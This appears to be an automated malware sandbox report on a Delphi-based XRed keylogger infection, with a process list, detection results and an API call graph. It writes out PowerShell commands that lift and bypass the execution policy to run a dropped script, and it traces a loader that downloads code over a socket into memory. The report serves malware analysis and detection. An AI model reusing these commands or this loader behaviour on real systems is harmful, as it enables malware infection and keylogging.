                                                                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:771'584 bytes
                                                                                                                                                                    MD5 hash:382B0F88502E718DFDF96DBC3AA3400A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    • Detection: 92%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:22:59:01
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                    Imagebase:0x650000
                                                                                                                                                                    File size:53'161'064 bytes
                                                                                                                                                                    MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:22:59:01
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:5'289'240 bytes
                                                                                                                                                                    MD5 hash:B4F00FBA3327488D4CB6FD36B2D567C6
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:22:59:07
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    Imagebase:0x160000
                                                                                                                                                                    File size:4'118'496 bytes
                                                                                                                                                                    MD5 hash:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 17%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:22:59:08
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:22:59:08
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:22:59:08
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:22:59:08
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:22:59:08
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    Imagebase:0x160000
                                                                                                                                                                    File size:4'118'496 bytes
                                                                                                                                                                    MD5 hash:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:13
                                                                                                                                                                    Start time:22:59:09
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                                                                    Imagebase:0xe60000
                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:22:59:09
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                                                                    Imagebase:0xe60000
                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:15
                                                                                                                                                                    Start time:22:59:11
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:771'584 bytes
                                                                                                                                                                    MD5 hash:382B0F88502E718DFDF96DBC3AA3400A
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:19
                                                                                                                                                                    Start time:22:59:22
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:22
                                                                                                                                                                    Start time:22:59:55
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156
                                                                                                                                                                    Imagebase:0xa20000
                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:24
                                                                                                                                                                    Start time:23:00:06
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156
                                                                                                                                                                    Imagebase:0xa20000
                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:26
                                                                                                                                                                    Start time:23:01:03
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\splwow64.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                                                    Imagebase:0x7ff64f8f0000
                                                                                                                                                                    File size:163'840 bytes
                                                                                                                                                                    MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:7.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                      Signature Coverage:4.8%
                                                                                                                                                                      Total number of Nodes:1619
                                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                                      execution_graph 10606 10001000 10607 1000100d _Error_objects 10606->10607 10608 10010b09 _Error_objects 2 API calls 10607->10608 10609 10001017 10608->10609 10717 10001080 malloc 10718 2870e07 ___scrt_dllmain_exception_filter 10880 10003d80 10883 100012c0 __std_exception_copy 10880->10883 10882 10003d93 10883->10882 11333 2860006 11336 2860032 11333->11336 11337 2860ae4 GetPEB 11336->11337 11338 286029b 11337->11338 11339 2860ae4 GetPEB 11338->11339 11342 28602a7 11339->11342 11340 28604a6 GetNativeSystemInfo 11341 28604d3 VirtualAlloc 11340->11341 11343 286002d 11340->11343 11344 28604ec 11341->11344 11342->11340 11342->11343 11344->11343 11345 10010610 118 API calls 11344->11345 11345->11343 11346 1000b680 11347 1000b6a0 11346->11347 11348 1000b690 _unlock_file 11346->11348 11348->11347 11234 2861087 11235 2861099 11234->11235 11237 28610a7 11234->11237 11236 2861125 NtdllDefWindowProc_W 11235->11236 11235->11237 11236->11237 11349 2860000 11351 2860005 11349->11351 11352 2860006 11351->11352 11353 2860032 121 API calls 11352->11353 11354 286002d 11353->11354 10610 2870280 10613 2870231 10610->10613 10611 2870200 recv 10611->10613 10612 28702bf VirtualAlloc 10616 28702ee 10612->10616 10613->10611 10613->10612 10614 2870282 closesocket WSACleanup 10613->10614 10615 287027e 10613->10615 10613->10616 10614->10613 10615->10612 11634 287090d 11635 2870922 11634->11635 11636 2870ee7 __DllMainCRTStartup@12 IsProcessorFeaturePresent 11635->11636 11637 287092e ___scrt_uninitialize_crt 11636->11637 10884 1000998b 10885 1000998e _Smanip _Error_objects 10884->10885 10886 1000b990 10 API calls 10885->10886 10887 10009ac0 10886->10887 10888 10004540 10 API calls 10887->10888 10889 10009ad7 10888->10889 10890 1000b970 2 API calls 10889->10890 10891 10009ae9 10890->10891 10892 10002210 8 API calls 10891->10892 10893 10009b0f 10892->10893 10894 10004390 14 API calls 10893->10894 10895 10009b1b _Smanip _Error_objects 10894->10895 10896 1000b990 10 API calls 10895->10896 10897 10009bd1 10896->10897 10898 10004540 10 API calls 10897->10898 10899 10009be8 10898->10899 10900 1000d190 12 API calls 10899->10900 10901 10009c1b 10900->10901 10902 100020a0 2 API calls 10901->10902 10903 10009c2d 10902->10903 10904 1000b970 2 API calls 10903->10904 10905 10009c3c 10904->10905 10906 10004680 DeleteFileA 10905->10906 10907 10009c4e 10906->10907 10908 10002190 8 API calls 10907->10908 10909 10009c68 10908->10909 10910 10004440 31 API calls 10909->10910 10911 10009c7f 10910->10911 10912 100020a0 2 API calls 10911->10912 10913 10009c91 Sleep 10912->10913 10914 10009ca9 10913->10914 10915 10002190 8 API calls 10914->10915 10916 10009cb5 _Smanip _Error_objects 10915->10916 10917 1000b990 10 API calls 10916->10917 10918 10009d2a 10917->10918 10919 10004540 10 API calls 10918->10919 10920 10009d41 10919->10920 10921 10002210 8 API calls 10920->10921 10922 10009d8b 10921->10922 10923 10004390 14 API calls 10922->10923 10924 10009d97 10923->10924 10925 100020a0 2 API calls 10924->10925 10926 10009daf 10925->10926 10927 1000b970 2 API calls 10926->10927 10928 10009dbe 10927->10928 10929 100020a0 2 API calls 10928->10929 10930 10009dcd 10929->10930 10931 10002190 8 API calls 10930->10931 10932 10009de5 _Smanip _Error_objects 10931->10932 10933 1000b990 10 API calls 10932->10933 10934 10009e5e 10933->10934 10935 10004540 10 API calls 10934->10935 10936 10009e75 10935->10936 10937 10002210 8 API calls 10936->10937 10938 10009ebf 10937->10938 10939 10004390 14 API calls 10938->10939 10940 10009ecb 10939->10940 10941 100020c0 2 API calls 10940->10941 10942 10009ef2 10941->10942 10943 100020a0 2 API calls 10942->10943 10944 10009efd 10943->10944 10945 100020a0 2 API calls 10944->10945 10946 10009f0c 10945->10946 10947 1000b970 2 API calls 10946->10947 10948 10009f1b 10947->10948 10949 100020a0 2 API calls 10948->10949 10950 10009f2a 10949->10950 10951 1000d260 8 API calls 10950->10951 10952 10009f43 10951->10952 10953 1000d2f0 10 API calls 10952->10953 10954 10009f71 10953->10954 10955 1000d2f0 10 API calls 10954->10955 10956 10009f9f 10955->10956 10957 1000d2f0 10 API calls 10956->10957 10958 10009fcd 10957->10958 10959 1000d2f0 10 API calls 10958->10959 10960 10009ffb 10959->10960 10961 1000d2f0 10 API calls 10960->10961 10962 1000a029 10961->10962 10963 1000d2f0 10 API calls 10962->10963 10964 1000a057 10963->10964 10965 1000d2f0 10 API calls 10964->10965 10966 1000a085 10965->10966 10967 1000d2f0 10 API calls 10966->10967 10968 1000a0b3 10967->10968 10969 1000d2f0 10 API calls 10968->10969 10970 1000a0e1 10969->10970 10971 1000d2f0 10 API calls 10970->10971 10972 1000a10f 10971->10972 10973 1000d2f0 10 API calls 10972->10973 10974 1000a13d 10973->10974 10975 100020a0 2 API calls 10974->10975 10976 1000a14f 10975->10976 10977 100020a0 2 API calls 10976->10977 10978 1000a15e 10977->10978 10979 100020a0 2 API calls 10978->10979 10980 1000a16d 10979->10980 10981 100020a0 2 API calls 10980->10981 10982 1000a17c 10981->10982 10983 100020a0 2 API calls 10982->10983 10984 1000a18b 10983->10984 10985 100020a0 2 API calls 10984->10985 10986 1000a19a 10985->10986 10987 100020a0 2 API calls 10986->10987 10988 1000a1a9 10987->10988 10989 100020a0 2 API calls 10988->10989 10990 1000a1b8 10989->10990 10991 100020a0 2 API calls 10990->10991 10992 1000a1c7 10991->10992 10993 100020a0 2 API calls 10992->10993 10994 1000a1d6 10993->10994 10995 100020a0 2 API calls 10994->10995 10996 1000a1e5 10995->10996 10997 10004680 DeleteFileA 10996->10997 10998 1000a1f7 10997->10998 10999 10002190 8 API calls 10998->10999 11000 1000a211 10999->11000 11001 10004440 31 API calls 11000->11001 11002 1000a228 11001->11002 11003 100020a0 2 API calls 11002->11003 11004 1000a23a Sleep 11003->11004 11005 1000a252 _Smanip _Error_objects 11004->11005 11006 1000b990 10 API calls 11005->11006 11007 1000a4a1 11006->11007 11008 10004540 10 API calls 11007->11008 11009 1000a4b8 _Smanip _Error_objects 11008->11009 11010 1000b990 10 API calls 11009->11010 11011 1000a55e 11010->11011 11012 10004540 10 API calls 11011->11012 11013 1000a575 11012->11013 11014 1000d150 9 API calls 11013->11014 11015 1000a5b4 11014->11015 11016 100020a0 2 API calls 11015->11016 11017 1000a5c6 11016->11017 11018 1000b970 2 API calls 11017->11018 11019 1000a5d5 11018->11019 11020 100020a0 2 API calls 11019->11020 11021 1000a5e4 11020->11021 11022 1000b970 2 API calls 11021->11022 11023 1000a5f3 11022->11023 11024 1000a601 WinExec 11023->11024 11025 1000a614 _Smanip _Error_objects 11024->11025 11026 1000b990 10 API calls 11025->11026 11027 1000a74d 11026->11027 11028 10004540 10 API calls 11027->11028 11029 1000a764 11028->11029 11030 1000b970 2 API calls 11029->11030 11031 1000a776 _Smanip _Error_objects 11030->11031 11032 1000b990 10 API calls 11031->11032 11033 1000a809 11032->11033 11034 10004540 10 API calls 11033->11034 11035 1000a820 11034->11035 11036 10002f30 11 API calls 11035->11036 11037 1000a853 11036->11037 11038 10002f00 11 API calls 11037->11038 11039 1000a892 11038->11039 11040 100020c0 2 API calls 11039->11040 11041 1000a8ad 11040->11041 11042 100020a0 2 API calls 11041->11042 11043 1000a8b8 11042->11043 11044 100020a0 2 API calls 11043->11044 11045 1000a8c7 11044->11045 11046 100020a0 2 API calls 11045->11046 11047 1000a8d6 11046->11047 11048 1000b970 2 API calls 11047->11048 11049 1000a8e5 11048->11049 11050 1000a8f3 WinExec Sleep 11049->11050 11051 1000a911 11050->11051 11052 10002190 8 API calls 11051->11052 11053 1000a91d 11052->11053 11054 100048a0 SetFileAttributesA 11053->11054 11055 1000a92d 11054->11055 11056 100020a0 2 API calls 11055->11056 11057 1000a93f 11056->11057 11058 10002190 8 API calls 11057->11058 11059 1000a957 11058->11059 11060 100048a0 SetFileAttributesA 11059->11060 11061 1000a967 11060->11061 11062 100020a0 2 API calls 11061->11062 11063 1000a979 11062->11063 11064 10004680 DeleteFileA 11063->11064 11065 1000a98b 11064->11065 11066 10004680 DeleteFileA 11065->11066 11067 1000a99f 11066->11067 11068 100020a0 2 API calls 11067->11068 11069 1000a9bb 11068->11069 11070 100020a0 2 API calls 11069->11070 11071 1000a9ca 11070->11071 11072 100020a0 2 API calls 11071->11072 11073 1000a9d9 11072->11073 11074 100020a0 2 API calls 11073->11074 11075 1000a9e8 11074->11075 11076 100020a0 2 API calls 11075->11076 11077 1000a9f7 11076->11077 11078 100020a0 2 API calls 11077->11078 11079 1000aa06 11078->11079 11080 100020a0 2 API calls 11079->11080 11081 1000aa15 11080->11081 11082 100020a0 2 API calls 11081->11082 11083 1000aa24 11082->11083 11084 100020a0 2 API calls 11083->11084 11085 1000aa33 11084->11085 11086 100020a0 2 API calls 11085->11086 11087 1000aa42 11086->11087 11088 100020a0 2 API calls 11087->11088 11089 1000aa51 11088->11089 11090 100020a0 2 API calls 11089->11090 11091 1000aa60 11090->11091 11092 1000b970 2 API calls 11091->11092 11093 1000aa6f 11092->11093 11094 1000b970 2 API calls 11093->11094 11095 1000aa7e 11094->11095 11096 100020a0 2 API calls 11095->11096 11097 1000aa8d 11096->11097 11098 100020a0 2 API calls 11097->11098 11099 1000aa9f 11098->11099 10617 1000ac10 10618 1000ac21 fpos 10617->10618 10619 1000c1b0 2 API calls 10618->10619 10624 1000ac57 10618->10624 10620 1000ac38 10619->10620 10621 1000ac3f fsetpos 10620->10621 10620->10624 10622 1000ac68 fpos 10621->10622 10621->10624 10623 1000c120 2 API calls 10622->10623 10623->10624 10844 1000d110 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@D ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 11100 1000ad90 11101 1000ada2 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J 11100->11101 11102 1000adbc ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11100->11102 11103 1000ae97 11101->11103 11104 1000ae54 11102->11104 11106 1000addd 11102->11106 11104->11103 11105 1000ae6b fwrite 11104->11105 11105->11103 11106->11104 11107 1000ae11 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11106->11107 11110 10002ac0 memmove 11107->11110 11109 1000ae28 ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH 11109->11104 11110->11109 11238 2870097 WSAStartup getaddrinfo 11239 2870110 WSACleanup 11238->11239 11248 2870129 11238->11248 11252 287011e 11239->11252 11240 2870144 socket 11242 2870186 connect 11240->11242 11243 287016d WSACleanup 11240->11243 11241 28701cc FreeAddrInfoW 11244 28701e0 WSACleanup 11241->11244 11253 28701f9 11241->11253 11245 28701c5 11242->11245 11246 28701aa closesocket 11242->11246 11243->11252 11244->11252 11245->11241 11246->11248 11247 2870200 recv 11247->11253 11248->11240 11248->11241 11249 2870282 closesocket WSACleanup 11249->11253 11250 287027e 11251 28702bf VirtualAlloc 11250->11251 11251->11252 11253->11247 11253->11249 11253->11250 11253->11251 11253->11252 11638 1000ab90 11639 1000ab9f 11638->11639 11640 1000abe6 11639->11640 11641 1000abc6 setvbuf 11639->11641 11641->11640 11642 1000abea 11641->11642 11643 1000c2d0 3 API calls 11642->11643 11643->11640 10719 1000d091 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11254 2864897 11255 28648cf 11254->11255 11282 2864677 GetModuleFileNameA 11255->11282 11257 28648f8 _Smanip _Error_objects 11284 2864657 DeleteFileA 11257->11284 11259 2869c25 11286 2864417 11259->11286 11261 2869c56 11262 2869c68 Sleep 11261->11262 11263 2869c80 _Smanip _Error_objects 11262->11263 11264 2864657 DeleteFileA 11263->11264 11265 286a1ce 11264->11265 11266 2864417 SetFileAttributesA 11265->11266 11267 286a1ff 11266->11267 11268 286a211 Sleep 11267->11268 11269 286a229 _Smanip _Error_objects 11268->11269 11270 286a5d8 WinExec 11269->11270 11271 286a5eb _Smanip _Error_objects 11270->11271 11272 286a8ca WinExec Sleep 11271->11272 11273 286a8e8 11272->11273 11290 2864877 11273->11290 11275 286a904 11276 2864877 SetFileAttributesA 11275->11276 11277 286a93e 11276->11277 11278 2864657 DeleteFileA 11277->11278 11279 286a962 11278->11279 11280 2864657 DeleteFileA 11279->11280 11281 286a976 11280->11281 11283 28646bf _Error_objects Concurrency::task_continuation_context::task_continuation_context 11282->11283 11283->11257 11285 2864668 11284->11285 11285->11259 11288 286444a 11286->11288 11287 28644be 11287->11261 11288->11287 11289 28644b6 SetFileAttributesA 11288->11289 11289->11287 11293 2861f27 11290->11293 11292 2864887 SetFileAttributesA 11292->11275 11294 2861f36 Concurrency::task_continuation_context::task_continuation_context 11293->11294 11294->11292 11358 10010697 11359 10010699 11358->11359 11360 100106b1 11359->11360 11362 100106b2 11359->11362 11363 100106bd 11362->11363 11364 100106c9 free 11363->11364 11365 100106d2 11363->11365 11364->11365 11365->11359 11111 1000999a 11112 100020a0 2 API calls 11111->11112 11113 100099af 11112->11113 11114 100020a0 2 API calls 11113->11114 11115 100099be 11114->11115 11116 100020a0 2 API calls 11115->11116 11117 100099cd 11116->11117 11118 100020a0 2 API calls 11117->11118 11119 100099dc 11118->11119 11120 1000b970 2 API calls 11119->11120 11121 100099eb 11120->11121 11122 1000b970 2 API calls 11121->11122 11123 100099fa 11122->11123 11124 100020a0 2 API calls 11123->11124 11125 10009a09 11124->11125 11126 100020a0 2 API calls 11125->11126 11127 10009a1b 11126->11127 11295 1000461a 11296 10002190 8 API calls 11295->11296 11297 1000462a 11296->11297 11366 10010e9b 11367 10010ea4 11366->11367 11368 10010ea9 11366->11368 11372 10011436 11367->11372 11376 10010d65 11368->11376 11373 1001144c 11372->11373 11375 10011455 11373->11375 11391 100113e9 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11373->11391 11375->11368 11377 10010d71 ___scrt_is_nonwritable_in_current_image 11376->11377 11378 10010d9a dllmain_raw 11377->11378 11379 10010d95 11377->11379 11387 10010d80 11377->11387 11380 10010db4 dllmain_crt_dispatch 11378->11380 11378->11387 11392 10011481 11379->11392 11380->11379 11380->11387 11383 10010e06 11384 10010e0f dllmain_crt_dispatch 11383->11384 11383->11387 11386 10010e22 dllmain_raw 11384->11386 11384->11387 11385 10011481 _DllMain@12 DisableThreadLibraryCalls 11388 10010ded 11385->11388 11386->11387 11396 10010cb7 11388->11396 11390 10010dfb dllmain_raw 11390->11383 11391->11375 11393 1001148a 11392->11393 11394 10010dd5 11392->11394 11393->11394 11395 10011493 DisableThreadLibraryCalls 11393->11395 11394->11383 11394->11385 11395->11394 11398 10010cc3 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11396->11398 11397 10010ccc ___scrt_uninitialize_crt __RTC_Initialize __DllMainCRTStartup@12 11397->11390 11398->11397 11399 10010cf4 11398->11399 11400 10010d5d 11398->11400 11419 10010912 11399->11419 11426 1001124d IsProcessorFeaturePresent 11400->11426 11403 10010cf9 11425 100114af __std_type_info_destroy_list 11403->11425 11405 10010d64 ___scrt_is_nonwritable_in_current_image 11406 10010d9a dllmain_raw 11405->11406 11407 10010d95 11405->11407 11415 10010d80 11405->11415 11408 10010db4 dllmain_crt_dispatch 11406->11408 11406->11415 11409 10011481 _DllMain@12 DisableThreadLibraryCalls 11407->11409 11408->11407 11408->11415 11410 10010dd5 11409->11410 11411 10010e06 11410->11411 11413 10011481 _DllMain@12 DisableThreadLibraryCalls 11410->11413 11412 10010e0f dllmain_crt_dispatch 11411->11412 11411->11415 11414 10010e22 dllmain_raw 11412->11414 11412->11415 11416 10010ded 11413->11416 11414->11415 11415->11390 11417 10010cb7 __DllMainCRTStartup@12 10 API calls 11416->11417 11418 10010dfb dllmain_raw 11417->11418 11418->11411 11420 10010917 ___scrt_release_startup_lock 11419->11420 11421 1001091b _execute_onexit_table 11420->11421 11422 10010927 __DllMainCRTStartup@12 11420->11422 11421->11403 11423 10010934 11422->11423 11424 100116c7 _cexit 11422->11424 11423->11403 11425->11397 11427 10011263 